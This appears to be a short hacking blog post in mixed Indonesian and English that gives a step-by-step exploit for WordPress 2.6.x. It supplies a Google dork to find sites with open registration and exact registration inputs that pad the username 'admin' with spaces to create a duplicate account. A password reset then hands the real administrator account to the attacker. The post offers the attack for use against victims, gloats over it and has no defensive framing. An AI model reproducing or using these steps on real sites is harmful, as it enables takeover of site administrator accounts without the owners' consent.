WordPress 2.6.x akan melakukan reset password apabila wp-login.php?action=register (enable)
google=inurl:wp-login.php?action=register
victim
========================================
1. go to victim.com/wp-login.php?action=register
2. Register as:
username=admin x
email=youremail@email.com
you see [x] in username ....... ??
type username=admin[55 space]x <<< :)
now victim add username admin duplicate ... :)
3. goto to victim.com/wp-login.php?action=lostpassword
type your email address and submit this form
4. check your email ... victim send reset for username=admin
and type new password ... bang .... :))
=========================================
jkthackerlink@gmail.com
0 komentar